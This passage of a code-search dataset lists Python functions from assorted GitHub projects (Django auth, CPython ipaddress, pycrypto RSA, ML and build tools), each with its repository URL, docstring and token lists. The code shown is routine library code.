[ "def", "check_spam", "(", "sender", ",", "instance", ",", "created", ",", "*", "*", "kwargs", ")", ":", "# Classify post as spam/ham.", "tasks", ".", "spam_check", ".", "spool", "(", "uid", "=", "instance", ".", "uid", ")" ]
https://github.com/ialbert/biostar-central/blob/2dc7bd30691a50b2da9c2833ba354056bc686afa/biostar/forum/signals.py#L170-L172
ethereon/caffe-tensorflow
d870c51e8fa3452cb210b378c78be7ba4dcc8cf0
kaffe/graph.py
python
GraphBuilder.__init__
(self, def_path, phase='test')
def_path: Path to the model definition (.prototxt) data_path: Path to the model data (.caffemodel) phase: Either 'test' or 'train'. Used for filtering phase-specific nodes.
def_path: Path to the model definition (.prototxt) data_path: Path to the model data (.caffemodel) phase: Either 'test' or 'train'. Used for filtering phase-specific nodes.
[ "def_path", ":", "Path", "to", "the", "model", "definition", "(", ".", "prototxt", ")", "data_path", ":", "Path", "to", "the", "model", "data", "(", ".", "caffemodel", ")", "phase", ":", "Either", "test", "or", "train", ".", "Used", "for", "filtering", ...
def __init__(self, def_path, phase='test'): ''' def_path: Path to the model definition (.prototxt) data_path: Path to the model data (.caffemodel) phase: Either 'test' or 'train'. Used for filtering phase-specific nodes. ''' self.def_path = def_path self.phase = phase self.load()
[ "def", "__init__", "(", "self", ",", "def_path", ",", "phase", "=", "'test'", ")", ":", "self", ".", "def_path", "=", "def_path", "self", ".", "phase", "=", "phase", "self", ".", "load", "(", ")" ]
https://github.com/ethereon/caffe-tensorflow/blob/d870c51e8fa3452cb210b378c78be7ba4dcc8cf0/kaffe/graph.py#L132-L140
larryhastings/gilectomy
4315ec3f1d6d4f813cc82ce27a24e7f784dbfc1a
Lib/ipaddress.py
python
IPv6Address.sixtofour
(self)
return IPv4Address((self._ip >> 80) & 0xFFFFFFFF)
Return the IPv4 6to4 embedded address. Returns: The IPv4 6to4-embedded address if present or None if the address doesn't appear to contain a 6to4 embedded address.
Return the IPv4 6to4 embedded address.
[ "Return", "the", "IPv4", "6to4", "embedded", "address", "." ]
def sixtofour(self): """Return the IPv4 6to4 embedded address. Returns: The IPv4 6to4-embedded address if present or None if the address doesn't appear to contain a 6to4 embedded address. """ if (self._ip >> 112) != 0x2002: return None return IPv4Address((self._ip >> 80) & 0xFFFFFFFF)
[ "def", "sixtofour", "(", "self", ")", ":", "if", "(", "self", ".", "_ip", ">>", "112", ")", "!=", "0x2002", ":", "return", "None", "return", "IPv4Address", "(", "(", "self", ".", "_ip", ">>", "80", ")", "&", "0xFFFFFFFF", ")" ]
https://github.com/larryhastings/gilectomy/blob/4315ec3f1d6d4f813cc82ce27a24e7f784dbfc1a/Lib/ipaddress.py#L2036-L2046
giantbranch/python-hacker-code
addbc8c73e7e6fb9e4fcadcec022fa1d3da4b96d
我手敲的代码(中文注释)/chapter9/pycrypto-2.6.1/build/lib.win32-2.7/Crypto/PublicKey/RSA.py
python
RSAImplementation.construct
(self, tup)
return _RSAobj(self, key)
Construct an RSA key from a tuple of valid RSA components. The modulus **n** must be the product of two primes. The public exponent **e** must be odd and larger than 1. In case of a private key, the following equations must apply: - e != 1 - p*q = n - e*d = 1 mod (p-1)(q-1) - p*u = 1 mod q :Parameters: tup : tuple A tuple of long integers, with at least 2 and no more than 6 items. The items come in the following order: 1. RSA modulus (n). 2. Public exponent (e). 3. Private exponent (d). Only required if the key is private. 4. First factor of n (p). Optional. 5. Second factor of n (q). Optional. 6. CRT coefficient, (1/p) mod q (u). Optional. :Return: An RSA key object (`_RSAobj`).
Construct an RSA key from a tuple of valid RSA components.
[ "Construct", "an", "RSA", "key", "from", "a", "tuple", "of", "valid", "RSA", "components", "." ]
def construct(self, tup): """Construct an RSA key from a tuple of valid RSA components. The modulus **n** must be the product of two primes. The public exponent **e** must be odd and larger than 1. In case of a private key, the following equations must apply: - e != 1 - p*q = n - e*d = 1 mod (p-1)(q-1) - p*u = 1 mod q :Parameters: tup : tuple A tuple of long integers, with at least 2 and no more than 6 items. The items come in the following order: 1. RSA modulus (n). 2. Public exponent (e). 3. Private exponent (d). Only required if the key is private. 4. First factor of n (p). Optional. 5. Second factor of n (q). Optional. 6. CRT coefficient, (1/p) mod q (u). Optional. :Return: An RSA key object (`_RSAobj`). """ key = self._math.rsa_construct(*tup) return _RSAobj(self, key)
[ "def", "construct", "(", "self", ",", "tup", ")", ":", "key", "=", "self", ".", "_math", ".", "rsa_construct", "(", "*", "tup", ")", "return", "_RSAobj", "(", "self", ",", "key", ")" ]
https://github.com/giantbranch/python-hacker-code/blob/addbc8c73e7e6fb9e4fcadcec022fa1d3da4b96d/我手敲的代码(中文注释)/chapter9/pycrypto-2.6.1/build/lib.win32-2.7/Crypto/PublicKey/RSA.py#L512-L540
kanzure/nanoengineer
874e4c9f8a9190f093625b267f9767e19f82e6c4
cad/src/operations/ops_motion.py
python
ops_motion_Mixin.Invert
(self)
Invert the atoms of the selected chunk(s) around the chunk centers
Invert the atoms of the selected chunk(s) around the chunk centers
[ "Invert", "the", "atoms", "of", "the", "selected", "chunk", "(", "s", ")", "around", "the", "chunk", "centers" ]
def Invert(self): """ Invert the atoms of the selected chunk(s) around the chunk centers """ mc = env.begin_op("Invert") cmd = greenmsg("Invert: ") if not self.selmols: msg = redmsg("No selected chunks to invert") env.history.message(cmd + msg) return self.changed() for m in self.selmols: m.stretch(-1.0) self.o.gl_update() info = fix_plurals( "Inverted %d chunk(s)" % len(self.selmols)) env.history.message( cmd + info) env.end_op(mc)
[ "def", "Invert", "(", "self", ")", ":", "mc", "=", "env", ".", "begin_op", "(", "\"Invert\"", ")", "cmd", "=", "greenmsg", "(", "\"Invert: \"", ")", "if", "not", "self", ".", "selmols", ":", "msg", "=", "redmsg", "(", "\"No selected chunks to invert\"", ...
https://github.com/kanzure/nanoengineer/blob/874e4c9f8a9190f093625b267f9767e19f82e6c4/cad/src/operations/ops_motion.py#L122-L140
marinho/geraldo
868ebdce67176d9b6205cddc92476f642c783fff
site/newsite/site-geraldo/django/contrib/auth/backends.py
python
ModelBackend.has_module_perms
(self, user_obj, app_label)
return False
Returns True if user_obj has any permissions in the given app_label.
Returns True if user_obj has any permissions in the given app_label.
[ "Returns", "True", "if", "user_obj", "has", "any", "permissions", "in", "the", "given", "app_label", "." ]
def has_module_perms(self, user_obj, app_label): """ Returns True if user_obj has any permissions in the given app_label. """ for perm in self.get_all_permissions(user_obj): if perm[:perm.index('.')] == app_label: return True return False
[ "def", "has_module_perms", "(", "self", ",", "user_obj", ",", "app_label", ")", ":", "for", "perm", "in", "self", ".", "get_all_permissions", "(", "user_obj", ")", ":", "if", "perm", "[", ":", "perm", ".", "index", "(", "'.'", ")", "]", "==", "app_labe...
https://github.com/marinho/geraldo/blob/868ebdce67176d9b6205cddc92476f642c783fff/site/newsite/site-geraldo/django/contrib/auth/backends.py#L67-L74
tokenika/eosfactory
ee00f662872690738a702fc05aca1f1c0c8d4783
eosfactory/core/setup.py
python
set_nodeos_address
(address, prefix=None)
Set testnet properties. :param str address: testnet url, for example `http://faucet.cryptokylin.io`. :param str prefix: A prefix prepended to names of system files like the wallet file and password map file and account map file, in order to relate them to the given testnet.
Set testnet properties.
[ "Set", "testnet", "properties", "." ]
def set_nodeos_address(address, prefix=None): '''Set testnet properties. :param str address: testnet url, for example `http://faucet.cryptokylin.io`. :param str prefix: A prefix prepended to names of system files like the wallet file and password map file and account map file, in order to relate them to the given testnet. ''' global __nodeos_address if address: __nodeos_address = address if not __nodeos_address: print(''' ERROR in setup.set_nodeos_address(...)! nodeos address is not set. ''') return address = __nodeos_address p = url_prefix(address) if prefix: p = prefix + "_" + p global __file_prefix __file_prefix = p global account_map account_map = __file_prefix + "accounts.json" global password_map password_map = __file_prefix + "passwords.json" global wallet_default_name wallet_default_name = __file_prefix + "default"
[ "def", "set_nodeos_address", "(", "address", ",", "prefix", "=", "None", ")", ":", "global", "__nodeos_address", "if", "address", ":", "__nodeos_address", "=", "address", "if", "not", "__nodeos_address", ":", "print", "(", "'''\nERROR in setup.set_nodeos_address(...)!...
https://github.com/tokenika/eosfactory/blob/ee00f662872690738a702fc05aca1f1c0c8d4783/eosfactory/core/setup.py#L44-L77
biolab/orange3
41685e1c7b1d1babe680113685a2d44bcc9fec0b
Orange/widgets/model/owlogisticregression.py
python
OWLogisticRegression.update_model
(self)
[]
def update_model(self): super().update_model() coef_table = None if self.model is not None: coef_table = create_coef_table(self.model) self.Outputs.coefficients.send(coef_table)
[ "def", "update_model", "(", "self", ")", ":", "super", "(", ")", ".", "update_model", "(", ")", "coef_table", "=", "None", "if", "self", ".", "model", "is", "not", "None", ":", "coef_table", "=", "create_coef_table", "(", "self", ".", "model", ")", "se...
https://github.com/biolab/orange3/blob/41685e1c7b1d1babe680113685a2d44bcc9fec0b/Orange/widgets/model/owlogisticregression.py#L109-L114
Nuitka/Nuitka
39262276993757fa4e299f497654065600453fc9
nuitka/build/inline_copy/lib/scons-4.3.0/SCons/Node/FS.py
python
RootDir._morph
(self)
Turn a file system Node (either a freshly initialized directory object or a separate Entry object) into a proper directory object. Set up this directory's entries and hook it into the file system tree. Specify that directories (this Node) don't use signatures for calculating whether they're current.
Turn a file system Node (either a freshly initialized directory object or a separate Entry object) into a proper directory object.
[ "Turn", "a", "file", "system", "Node", "(", "either", "a", "freshly", "initialized", "directory", "object", "or", "a", "separate", "Entry", "object", ")", "into", "a", "proper", "directory", "object", "." ]
def _morph(self): """Turn a file system Node (either a freshly initialized directory object or a separate Entry object) into a proper directory object. Set up this directory's entries and hook it into the file system tree. Specify that directories (this Node) don't use signatures for calculating whether they're current. """ self.repositories = [] self.srcdir = None self.entries = {'.': self, '..': self.dir} self.cwd = self self.searched = 0 self._sconsign = None self.variant_dirs = [] self.changed_since_last_build = 3 self._func_sconsign = 1 self._func_exists = 2 self._func_get_contents = 2 # Don't just reset the executor, replace its action list, # because it might have some pre-or post-actions that need to # be preserved. # # But don't reset the executor if there is a non-null executor # attached already. The existing executor might have other # targets, in which case replacing the action list with a # Mkdir action is a big mistake. if not hasattr(self, 'executor'): self.builder = get_MkdirBuilder() self.get_executor().set_action_list(self.builder.action) else: # Prepend MkdirBuilder action to existing action list l = self.get_executor().action_list a = get_MkdirBuilder().action l.insert(0, a) self.get_executor().set_action_list(l)
[ "def", "_morph", "(", "self", ")", ":", "self", ".", "repositories", "=", "[", "]", "self", ".", "srcdir", "=", "None", "self", ".", "entries", "=", "{", "'.'", ":", "self", ",", "'..'", ":", "self", ".", "dir", "}", "self", ".", "cwd", "=", "s...
https://github.com/Nuitka/Nuitka/blob/39262276993757fa4e299f497654065600453fc9/nuitka/build/inline_copy/lib/scons-4.3.0/SCons/Node/FS.py#L2362-L2400
cgre-aachen/gempy
6ad16c46fc6616c9f452fba85d31ce32decd8b10
gempy/bayesian/fields.py
python
fuzziness
(probabilities: np.ndarray)
return fuzz
Return the fuzziness of the probability array Eq 3. from doi.org/10.1016/j.tecto.2011.05.001 :param probabilities: probabilities array :return: float of fuzziness
Return the fuzziness of the probability array
[ "Return", "the", "fuzziness", "of", "the", "probability", "array" ]
def fuzziness(probabilities: np.ndarray) -> float: """ Return the fuzziness of the probability array Eq 3. from doi.org/10.1016/j.tecto.2011.05.001 :param probabilities: probabilities array :return: float of fuzziness """ p = probabilities fuzz = -np.mean(np.nan_to_num(p * np.log(p) + (1 - p) * np.log(1 - p))) return fuzz
[ "def", "fuzziness", "(", "probabilities", ":", "np", ".", "ndarray", ")", "->", "float", ":", "p", "=", "probabilities", "fuzz", "=", "-", "np", ".", "mean", "(", "np", ".", "nan_to_num", "(", "p", "*", "np", ".", "log", "(", "p", ")", "+", "(", ...
https://github.com/cgre-aachen/gempy/blob/6ad16c46fc6616c9f452fba85d31ce32decd8b10/gempy/bayesian/fields.py#L44-L54
hclhkbu/dlbench
978b034e9c34e6aaa38782bb1e4a2cea0c01d0f9
synthetic/experiments/tensorflow/fc/tf_upgrade.py
python
TensorFlowCodeUpgrader.process_tree
(self, root_directory, output_root_directory)
return file_count, report, tree_errors
Processes upgrades on an entire tree of python files in place. Note that only Python files. If you have custom code in other languages, you will need to manually upgrade those. Args: root_directory: Directory to walk and process. output_root_directory: Directory to use as base Returns: A tuple of files processed, the report string ofr all files, and errors
Processes upgrades on an entire tree of python files in place.
[ "Processes", "upgrades", "on", "an", "entire", "tree", "of", "python", "files", "in", "place", "." ]
def process_tree(self, root_directory, output_root_directory): """Processes upgrades on an entire tree of python files in place. Note that only Python files. If you have custom code in other languages, you will need to manually upgrade those. Args: root_directory: Directory to walk and process. output_root_directory: Directory to use as base Returns: A tuple of files processed, the report string ofr all files, and errors """ # make sure output directory doesn't exist if output_root_directory and os.path.exists(output_root_directory): print("Output directory %r must not already exist." % ( output_root_directory)) sys.exit(1) # make sure output directory does not overlap with root_directory norm_root = os.path.split(os.path.normpath(root_directory)) norm_output = os.path.split(os.path.normpath(output_root_directory)) if norm_root == norm_output: print("Output directory %r same as input directory %r" % ( root_directory, output_root_directory)) sys.exit(1) # Collect list of files to process (we do this to correctly handle if the # user puts the output directory in some sub directory of the input dir) files_to_process = [] for dir_name, _, file_list in os.walk(root_directory): py_files = [f for f in file_list if f.endswith(".py")] for filename in py_files: fullpath = os.path.join(dir_name, filename) fullpath_output = os.path.join( output_root_directory, os.path.relpath(fullpath, root_directory)) files_to_process.append((fullpath, fullpath_output)) file_count = 0 tree_errors = [] report = "" report += ("=" * 80) + "\n" report += "Input tree: %r\n" % root_directory report += ("=" * 80) + "\n" for input_path, output_path in files_to_process: output_directory = os.path.dirname(output_path) if not os.path.isdir(output_directory): os.makedirs(output_directory) file_count += 1 _, l_report, l_errors = self.process_file(input_path, output_path) tree_errors += l_errors report += l_report return file_count, report, tree_errors
[ "def", "process_tree", "(", "self", ",", "root_directory", ",", "output_root_directory", ")", ":", "# make sure output directory doesn't exist", "if", "output_root_directory", "and", "os", ".", "path", ".", "exists", "(", "output_root_directory", ")", ":", "print", "(...
https://github.com/hclhkbu/dlbench/blob/978b034e9c34e6aaa38782bb1e4a2cea0c01d0f9/synthetic/experiments/tensorflow/fc/tf_upgrade.py#L567-L620
selfteaching/selfteaching-python-camp
9982ee964b984595e7d664b07c389cddaf158f1e
19100205/Ceasar1978/pip-19.0.3/src/pip/_vendor/distlib/resources.py
python
ResourceCache.get
(self, resource)
return result
Get a resource into the cache, :param resource: A :class:`Resource` instance. :return: The pathname of the resource in the cache.
Get a resource into the cache,
[ "Get", "a", "resource", "into", "the", "cache" ]
def get(self, resource): """ Get a resource into the cache, :param resource: A :class:`Resource` instance. :return: The pathname of the resource in the cache. """ prefix, path = resource.finder.get_cache_info(resource) if prefix is None: result = path else: result = os.path.join(self.base, self.prefix_to_dir(prefix), path) dirname = os.path.dirname(result) if not os.path.isdir(dirname): os.makedirs(dirname) if not os.path.exists(result): stale = True else: stale = self.is_stale(resource, path) if stale: # write the bytes of the resource to the cache location with open(result, 'wb') as f: f.write(resource.bytes) return result
[ "def", "get", "(", "self", ",", "resource", ")", ":", "prefix", ",", "path", "=", "resource", ".", "finder", ".", "get_cache_info", "(", "resource", ")", "if", "prefix", "is", "None", ":", "result", "=", "path", "else", ":", "result", "=", "os", ".",...
https://github.com/selfteaching/selfteaching-python-camp/blob/9982ee964b984595e7d664b07c389cddaf158f1e/19100205/Ceasar1978/pip-19.0.3/src/pip/_vendor/distlib/resources.py#L46-L69
FSecureLABS/Jandroid
e31d0dab58a2bfd6ed8e0a387172b8bd7c893436
libs/platform-tools/platform-tools_linux/systrace/catapult/devil/devil/android/forwarder.py
python
Forwarder.DevicePortForHostPort
(host_port)
Returns the device port that corresponds to a given host port.
Returns the device port that corresponds to a given host port.
[ "Returns", "the", "device", "port", "that", "corresponds", "to", "a", "given", "host", "port", "." ]
def DevicePortForHostPort(host_port): """Returns the device port that corresponds to a given host port.""" with _FileLock(Forwarder._LOCK_PATH): serial_and_port = Forwarder._GetInstanceLocked( None)._host_to_device_port_map.get(host_port) return serial_and_port[1] if serial_and_port else None
[ "def", "DevicePortForHostPort", "(", "host_port", ")", ":", "with", "_FileLock", "(", "Forwarder", ".", "_LOCK_PATH", ")", ":", "serial_and_port", "=", "Forwarder", ".", "_GetInstanceLocked", "(", "None", ")", ".", "_host_to_device_port_map", ".", "get", "(", "h...
https://github.com/FSecureLABS/Jandroid/blob/e31d0dab58a2bfd6ed8e0a387172b8bd7c893436/libs/platform-tools/platform-tools_linux/systrace/catapult/devil/devil/android/forwarder.py#L248-L253
theislab/anndata
664e32b0aa6625fe593370d37174384c05abfd4e
anndata/_core/views.py
python
_ViewMixin.__init__
( self, *args, view_args: Tuple["anndata.AnnData", str, Tuple[str, ...]] = None, **kwargs, )
[]
def __init__( self, *args, view_args: Tuple["anndata.AnnData", str, Tuple[str, ...]] = None, **kwargs, ): if view_args is not None: view_args = ElementRef(*view_args) self._view_args = view_args super().__init__(*args, **kwargs)
[ "def", "__init__", "(", "self", ",", "*", "args", ",", "view_args", ":", "Tuple", "[", "\"anndata.AnnData\"", ",", "str", ",", "Tuple", "[", "str", ",", "...", "]", "]", "=", "None", ",", "*", "*", "kwargs", ",", ")", ":", "if", "view_args", "is", ...
https://github.com/theislab/anndata/blob/664e32b0aa6625fe593370d37174384c05abfd4e/anndata/_core/views.py#L48-L57
ethereum/py-evm
026ee20f8d9b70d7c1b6a4fb9484d5489d425e54
eth/abc.py
python
TransactionContextAPI.gas_price
(self)
Return the gas price of the transaction context.
Return the gas price of the transaction context.
[ "Return", "the", "gas", "price", "of", "the", "transaction", "context", "." ]
def gas_price(self) -> int: """ Return the gas price of the transaction context. """ ...
[ "def", "gas_price", "(", "self", ")", "->", "int", ":", "..." ]
https://github.com/ethereum/py-evm/blob/026ee20f8d9b70d7c1b6a4fb9484d5489d425e54/eth/abc.py#L1413-L1417
allegroai/clearml
5953dc6eefadcdfcc2bdbb6a0da32be58823a5af
clearml/debugging/timer.py
python
Timer.reset_average
(self)
Reset average counters (does not change current timer)
Reset average counters (does not change current timer)
[ "Reset", "average", "counters", "(", "does", "not", "change", "current", "timer", ")" ]
def reset_average(self): """ Reset average counters (does not change current timer) """ self._total_time = 0 self._average_time = 0 self._calls = 0
[ "def", "reset_average", "(", "self", ")", ":", "self", ".", "_total_time", "=", "0", "self", ".", "_average_time", "=", "0", "self", ".", "_calls", "=", "0" ]
https://github.com/allegroai/clearml/blob/5953dc6eefadcdfcc2bdbb6a0da32be58823a5af/clearml/debugging/timer.py#L24-L28
google/trax
d6cae2067dedd0490b78d831033607357e975015
trax/rl/actor_critic.py
python
SamplingAWR.policy_loss
(self, **unused_kwargs)
return tl.Serial( tl.Fn('LossInput', LossInput, n_out=4), # Policy loss is expected to consume # (log_probs, advantages, old_log_probs, mask). SamplingAWRLoss( beta=self._beta, w_max=self._w_max, thresholds=self._thresholds, reweight=self._reweight, sampled_all_discrete=self._sample_all_discrete_actions) )
Policy loss.
Policy loss.
[ "Policy", "loss", "." ]
def policy_loss(self, **unused_kwargs): """Policy loss.""" def LossInput(dist_inputs, actions, q_values, act_log_probs, mask): # pylint: disable=invalid-name """Calculates action log probabilities and normalizes advantages.""" # (batch_size, n_samples, ...) -> (n_samples, batch_size, ...) q_values = jnp.swapaxes(q_values, 0, 1) mask = jnp.swapaxes(mask, 0, 1) actions = jnp.swapaxes(actions, 0, 1) act_log_probs = jnp.swapaxes(act_log_probs, 0, 1) # TODO(pkozakowski,lukaszkaiser): Try max here, or reweighting? if self._sample_all_discrete_actions: values = jnp.sum(q_values * jnp.exp(act_log_probs), axis=0) else: values = jnp.mean(q_values, axis=0) advantages = q_values - values # Broadcasting values over n_samples advantages = self._preprocess_advantages(advantages) # Broadcast inputs and calculate log-probs dist_inputs = jnp.broadcast_to( dist_inputs, (self._q_value_n_samples,) + dist_inputs.shape) log_probs = self._policy_dist.log_prob(dist_inputs, actions) return (log_probs, advantages, act_log_probs, mask) return tl.Serial( tl.Fn('LossInput', LossInput, n_out=4), # Policy loss is expected to consume # (log_probs, advantages, old_log_probs, mask). SamplingAWRLoss( beta=self._beta, w_max=self._w_max, thresholds=self._thresholds, reweight=self._reweight, sampled_all_discrete=self._sample_all_discrete_actions) )
[ "def", "policy_loss", "(", "self", ",", "*", "*", "unused_kwargs", ")", ":", "def", "LossInput", "(", "dist_inputs", ",", "actions", ",", "q_values", ",", "act_log_probs", ",", "mask", ")", ":", "# pylint: disable=invalid-name", "\"\"\"Calculates action log probabil...
https://github.com/google/trax/blob/d6cae2067dedd0490b78d831033607357e975015/trax/rl/actor_critic.py#L1148-L1180
MegEngine/Models
4c55d28bad03652a4e352bf5e736a75df041d84a
official/vision/detection/models/freeanchor.py
python
FreeAnchor.preprocess_image
(self, image)
return normed_image
[]
def preprocess_image(self, image): padded_image = layers.get_padded_tensor(image, 32, 0.0) normed_image = ( padded_image - np.array(self.cfg.img_mean, dtype="float32")[None, :, None, None] ) / np.array(self.cfg.img_std, dtype="float32")[None, :, None, None] return normed_image
[ "def", "preprocess_image", "(", "self", ",", "image", ")", ":", "padded_image", "=", "layers", ".", "get_padded_tensor", "(", "image", ",", "32", ",", "0.0", ")", "normed_image", "=", "(", "padded_image", "-", "np", ".", "array", "(", "self", ".", "cfg",...
https://github.com/MegEngine/Models/blob/4c55d28bad03652a4e352bf5e736a75df041d84a/official/vision/detection/models/freeanchor.py#L62-L68
lxc/pylxd
d82e4bbf81cb2a932d62179e895c955c489066fd
pylxd/models/instance.py
python
Instance.rename
(self, name, wait=False)
Rename an instance.
Rename an instance.
[ "Rename", "an", "instance", "." ]
def rename(self, name, wait=False): """Rename an instance.""" response = self.api.post(json={"name": name}) if wait: self.client.operations.wait_for_operation(response.json()["operation"]) self.name = name
[ "def", "rename", "(", "self", ",", "name", ",", "wait", "=", "False", ")", ":", "response", "=", "self", ".", "api", ".", "post", "(", "json", "=", "{", "\"name\"", ":", "name", "}", ")", "if", "wait", ":", "self", ".", "client", ".", "operations...
https://github.com/lxc/pylxd/blob/d82e4bbf81cb2a932d62179e895c955c489066fd/pylxd/models/instance.py#L335-L341
IronLanguages/ironpython3
7a7bb2a872eeab0d1009fc8a6e24dca43f65b693
Src/StdLib/Lib/lib2to3/pgen2/token.py
python
ISEOF
(x)
return x == ENDMARKER
[]
def ISEOF(x): return x == ENDMARKER
[ "def", "ISEOF", "(", "x", ")", ":", "return", "x", "==", "ENDMARKER" ]
https://github.com/IronLanguages/ironpython3/blob/7a7bb2a872eeab0d1009fc8a6e24dca43f65b693/Src/StdLib/Lib/lib2to3/pgen2/token.py#L82-L83
tobyyouup/conv_seq2seq
78a6e4e62a4c57a5caa9d584033a85e810fd726e
seq2seq/configurable.py
python
_deep_merge_dict
(dict_x, dict_y, path=None)
return dict_x
Recursively merges dict_y into dict_x.
Recursively merges dict_y into dict_x.
[ "Recursively", "merges", "dict_y", "into", "dict_x", "." ]
def _deep_merge_dict(dict_x, dict_y, path=None): """Recursively merges dict_y into dict_x. """ if path is None: path = [] for key in dict_y: if key in dict_x: if isinstance(dict_x[key], dict) and isinstance(dict_y[key], dict): _deep_merge_dict(dict_x[key], dict_y[key], path + [str(key)]) elif dict_x[key] == dict_y[key]: pass # same leaf value else: dict_x[key] = dict_y[key] else: dict_x[key] = dict_y[key] return dict_x
[ "def", "_deep_merge_dict", "(", "dict_x", ",", "dict_y", ",", "path", "=", "None", ")", ":", "if", "path", "is", "None", ":", "path", "=", "[", "]", "for", "key", "in", "dict_y", ":", "if", "key", "in", "dict_x", ":", "if", "isinstance", "(", "dict...
https://github.com/tobyyouup/conv_seq2seq/blob/78a6e4e62a4c57a5caa9d584033a85e810fd726e/seq2seq/configurable.py#L69-L83
uqfoundation/klepto
a2b941fa2053ccbad731180d015bd39d3ee18c27
klepto/_archives.py
python
dir_archive._hasinput
(self, root)
return bool(walk(root,patterns=self._args,recurse=False,folders=False,files=True,links=False))
check if results subdirectory has stored input file
check if results subdirectory has stored input file
[ "check", "if", "results", "subdirectory", "has", "stored", "input", "file" ]
def _hasinput(self, root): "check if results subdirectory has stored input file" return bool(walk(root,patterns=self._args,recurse=False,folders=False,files=True,links=False))
[ "def", "_hasinput", "(", "self", ",", "root", ")", ":", "return", "bool", "(", "walk", "(", "root", ",", "patterns", "=", "self", ".", "_args", ",", "recurse", "=", "False", ",", "folders", "=", "False", ",", "files", "=", "True", ",", "links", "="...
https://github.com/uqfoundation/klepto/blob/a2b941fa2053ccbad731180d015bd39d3ee18c27/klepto/_archives.py#L542-L544
mxdg/passbytcp
0230198598b6df0098ac1630c10c1d377cdbf3f9
slaver/common_func.py
python
CtrlPkg._prebuilt_pkg
(cls, pkg_type, fallback)
return cls._cache_prebuilt_pkg[pkg_type]
act as lru_cache
act as lru_cache
[ "act", "as", "lru_cache" ]
def _prebuilt_pkg(cls, pkg_type, fallback): """act as lru_cache""" if pkg_type not in cls._cache_prebuilt_pkg: pkg = fallback(force_rebuilt=True) cls._cache_prebuilt_pkg[pkg_type] = pkg return cls._cache_prebuilt_pkg[pkg_type]
[ "def", "_prebuilt_pkg", "(", "cls", ",", "pkg_type", ",", "fallback", ")", ":", "if", "pkg_type", "not", "in", "cls", ".", "_cache_prebuilt_pkg", ":", "pkg", "=", "fallback", "(", "force_rebuilt", "=", "True", ")", "cls", ".", "_cache_prebuilt_pkg", "[", "...
https://github.com/mxdg/passbytcp/blob/0230198598b6df0098ac1630c10c1d377cdbf3f9/slaver/common_func.py#L388-L394
auroua/InsightFace_TF
6ffe4296460bdfea56f91521db6d6412a89249d9
nets/resnet.py
python
conv2d_same
(inputs, num_outputs, kernel_size, strides, rate=1, scope=None)
Reference slim resnet :param inputs: :param num_outputs: :param kernel_size: :param strides: :param rate: :param scope: :return:
Reference slim resnet :param inputs: :param num_outputs: :param kernel_size: :param strides: :param rate: :param scope: :return:
[ "Reference", "slim", "resnet", ":", "param", "inputs", ":", ":", "param", "num_outputs", ":", ":", "param", "kernel_size", ":", ":", "param", "strides", ":", ":", "param", "rate", ":", ":", "param", "scope", ":", ":", "return", ":" ]
def conv2d_same(inputs, num_outputs, kernel_size, strides, rate=1, scope=None): ''' Reference slim resnet :param inputs: :param num_outputs: :param kernel_size: :param strides: :param rate: :param scope: :return: ''' if strides == 1: if rate == 1: nets = tl.layers.Conv2d(inputs, n_filter=num_outputs, filter_size=(kernel_size, kernel_size), b_init=None, strides=(strides, strides), act=None, padding='SAME', name=scope) nets = tl.layers.BatchNormLayer(nets, act=tf.nn.relu, is_train=True, name=scope+'_bn/BatchNorm') else: nets = tl.layers.AtrousConv2dLayer(inputs, n_filter=num_outputs, filter_size=(kernel_size, kernel_size), rate=rate, act=None, padding='SAME', name=scope) nets = tl.layers.BatchNormLayer(nets, act=tf.nn.relu, is_train=True, name=scope+'_bn/BatchNorm') return nets else: kernel_size_effective = kernel_size + (kernel_size - 1) * (rate - 1) pad_total = kernel_size_effective - 1 pad_beg = pad_total // 2 pad_end = pad_total - pad_beg inputs = tl.layers.PadLayer(inputs, [[0, 0], [pad_beg, pad_end], [pad_beg, pad_end], [0, 0]], name='padding_%s' % scope) if rate == 1: nets = tl.layers.Conv2d(inputs, n_filter=num_outputs, filter_size=(kernel_size, kernel_size), b_init=None, strides=(strides, strides), act=None, padding='VALID', name=scope) nets = tl.layers.BatchNormLayer(nets, act=tf.nn.relu, is_train=True, name=scope+'_bn/BatchNorm') else: nets = tl.layers.AtrousConv2dLayer(inputs, n_filter=num_outputs, filter_size=(kernel_size, kernel_size), b_init=None, rate=rate, act=None, padding='SAME', name=scope) nets = tl.layers.BatchNormLayer(nets, act=tf.nn.relu, is_train=True, name=scope+'_bn/BatchNorm') return nets
[ "def", "conv2d_same", "(", "inputs", ",", "num_outputs", ",", "kernel_size", ",", "strides", ",", "rate", "=", "1", ",", "scope", "=", "None", ")", ":", "if", "strides", "==", "1", ":", "if", "rate", "==", "1", ":", "nets", "=", "tl", ".", "layers"...
https://github.com/auroua/InsightFace_TF/blob/6ffe4296460bdfea56f91521db6d6412a89249d9/nets/resnet.py#L66-L101
jcberquist/sublimetext-cfml
d1e37202eacbf4dd048f2822b7b9d9a93e8cebcf
src/component_index/component_index.py
python
build_dot_paths
(path_index, mappings, project_file_dir)
return dot_paths
[]
def build_dot_paths(path_index, mappings, project_file_dir): dot_paths = {} for file_path in path_index: for mapping in mappings: normalized_mapping = utils.normalize_mapping(mapping, project_file_dir) if file_path.startswith(normalized_mapping["path"]): mapped_path = normalized_mapping["mapping"] + file_path.replace(normalized_mapping["path"], "") path_parts = mapped_path.split("/")[1:] dot_path = ".".join(path_parts)[:-4] dot_paths[dot_path.lower()] = {"file_path": file_path, "dot_path": dot_path} return dot_paths
[ "def", "build_dot_paths", "(", "path_index", ",", "mappings", ",", "project_file_dir", ")", ":", "dot_paths", "=", "{", "}", "for", "file_path", "in", "path_index", ":", "for", "mapping", "in", "mappings", ":", "normalized_mapping", "=", "utils", ".", "normali...
https://github.com/jcberquist/sublimetext-cfml/blob/d1e37202eacbf4dd048f2822b7b9d9a93e8cebcf/src/component_index/component_index.py#L12-L22
yt-project/yt
dc7b24f9b266703db4c843e329c6c8644d47b824
yt/frontends/stream/data_structures.py
python
StreamOctreeHandler._setup_classes
(self)
[]
def _setup_classes(self): dd = self._get_data_reader_dict() super()._setup_classes(dd)
[ "def", "_setup_classes", "(", "self", ")", ":", "dd", "=", "self", ".", "_get_data_reader_dict", "(", ")", "super", "(", ")", ".", "_setup_classes", "(", "dd", ")" ]
https://github.com/yt-project/yt/blob/dc7b24f9b266703db4c843e329c6c8644d47b824/yt/frontends/stream/data_structures.py#L809-L811
khanhnamle1994/natural-language-processing
01d450d5ac002b0156ef4cf93a07cb508c1bcdc5
assignment1/.env/lib/python2.7/site-packages/pip/_vendor/cachecontrol/heuristics.py
python
BaseHeuristic.warning
